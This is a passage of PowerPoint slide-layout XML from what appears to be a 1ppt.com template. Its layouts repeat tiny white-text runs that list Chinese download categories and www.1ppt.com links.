              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout63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63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63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63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64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64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64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64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64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64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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout64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64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64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64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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout65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65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65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65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65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65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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
